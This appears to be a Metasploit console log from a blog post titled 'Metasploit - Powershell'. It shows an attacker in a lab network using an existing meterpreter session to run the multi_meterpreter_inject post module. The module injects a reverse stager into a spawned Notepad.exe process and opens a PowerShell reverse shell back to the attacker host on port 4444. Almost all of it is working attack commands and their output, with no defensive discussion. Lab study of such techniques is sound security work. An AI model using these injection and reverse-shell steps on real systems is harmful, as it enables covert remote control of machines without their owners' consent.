msf post(multi_meterpreter_inject) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 SECLAB\nfs @ SECLAB 192.168.1.103:8443 -> 192.168.1.106:30775 (192.168.1.106)
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > run
[*] Running module against SECLAB
[*] Starting connection handler at port 4444 for windows/powershell_reverse_tcp
[+] exploit/multi/handler started!
[*] Creating a reverse meterpreter stager: LHOST=192.168.1.103 LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 3752
[*] Injecting meterpreter into process ID 3752
[*] Allocated memory at address 0x00160000, for 1723 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 3752
[*] Powershell session session 2 opened (192.168.1.103:4444 -> 192.168.1.106:30795) at 2015-11-16 15:21:10 +0000
[*] Post module execution completed
msf post(multi_meterpreter_inject) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 SECLAB\nfs @ SECLAB 192.168.1.103:8443 -> 192.168.1.106:30775 (192.168.1.106)
2 powershell win 192.168.1.103:4444 -> 192.168.1.106:30795 (192.168.1.106)
msf post(multi_meterpreter_inject) > sessions -i 2
[*] Starting interaction with 2...
Windows PowerShell running as user nfs on SECLAB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>Get-Help
TOPIC
Get-Help
.....
Metasploit - Powershell
最新推荐文章于 2024-02-25 20:42:36 发布